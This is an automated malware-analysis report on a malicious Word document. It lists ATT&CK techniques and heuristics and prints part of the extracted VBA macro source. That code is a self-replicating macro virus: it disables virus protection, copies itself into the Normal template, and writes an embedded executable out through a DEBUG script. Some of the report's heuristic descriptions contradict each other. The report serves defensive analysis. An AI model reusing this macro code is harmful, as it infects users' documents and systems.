MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating the use of the Shell() function within its VBA macros. The AutoClose macro is designed to export its own code to 'c:\kloop.dat', then write a PE header and other data to 'c:\kloop.dbg', and finally attempt to execute 'c:\kloop.exe'. This strongly suggests the macro is acting as a downloader or initial execution stage for a secondary payload.
Heuristics 5
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 75537 bytes |
SHA-256: 13f8af63dd9ac9f7a4e584e409d71c15190f41829767e4714b2d8552b5f7dcaa |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoClose()
On Error Resume Next
Options.VirusProtection = (0 - 0)
Options.SaveNormalPrompt = (0 - 0)
Options.ConfirmConversions = (0 - 0)
ad = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.CountOfLines
nt = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines
If nt = 0 Then
Set host = NormalTemplate.VBProject.VBComponents.Item(1)
ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\kloop.dat"
End If
If ad = 0 Then Set host = ActiveDocument.VBProject.VBComponents.Item(1)
If nt > 0 And ad > 0 Then GoTo err
host.codemodule.AddFromFile ("c:\kloop.dat")
With host.codemodule
For x = 1 To 4
.deletelines 1
Next x
End With
err:
If nt <> 0 And ad = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
Kill "C:\KLOOP.DBG"
Kill "C:\KLOOP.EX"
Kill "C:\KLOOP.BAT"
If Dir("C:\KLOOP.EXE") <> "" Then GoTo NODROP
Open "C:\KLOOP.DBG" For Output As 5
Print #5, "N C:\KLOOP.EX"
Print #5, "E 0100 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00"
Print #5, "E 0110 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00"
Print #5, "E 0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0130 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00"
Print #5, "E 0140 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68"
Print #5, "E 0150 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F"
Print #5, "E 0160 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20"
Print #5, "E 0170 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00"
Print #5, "E 0180 E7 01 6D 38 A3 60 03 6B A3 60 03 6B A3 60 03 6B"
Print #5, "E 0190 A3 60 02 6B 91 60 03 6B C1 7F 10 6B A0 60 03 6B"
Print #5, "E 01A0 4B 7F 08 6B A2 60 03 6B 4B 7F 09 6B E1 60 03 6B"
Print #5, "E 01B0 20 7C 0D 6B AF 60 03 6B 5C 40 09 6B A2 60 03 6B"
Print #5, "E 01C0 52 69 63 68 A3 60 03 6B 00 00 00 00 00 00 00 00"
Print #5, "E 01D0 50 45 00 00 4C 01 03 00 BE 2B 74 39 00 00 00 00"
Print #5, "E 01E0 00 00 00 00 E0 00 0F 01 0B 01 06 00 00 40 00 00"
Print #5, "E 01F0 00 10 00 00 00 70 00 00 80 BB 00 00 00 80 00 00"
Print #5, "E 0200 00 C0 00 00 00 00 40 00 00 10 00 00 00 02 00 00"
Print #5, "E 0210 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00"
Print #5, "E 0220 00 D0 00 00 00 10 00 00 00 00 00 00 03 00 00 00"
Print #5, "E 0230 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00"
Print #5, "E 0240 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0250 00 C0 00 00 60 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0270 60 C0 00 00 14 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 02A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 02B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 02C0 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00"
Print #5, "E 02D0 00 70 00 00 00 10 00 00 00 00 00 00 00 04 00 00"
Print #5, "E 02E0 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 E0"
Print #5, "E 02F0 55 50 58 31 00 00 00 00 00 40 00 00 00 80 00 00"
Print #5, "E 0300 00 3E 00 00 00 04 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0310 00 00 00 00 40 00 00 E0 55 50 58 32 00 00 00 00"
Print #5, "E 0320 00 10 00 00 00 C0 00 00 00 02 00 00 00 42 00 00"
Print #5, "E 0330 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0"
Print #5, "E 0340 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0350 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0360 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0370 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0380 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0390 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.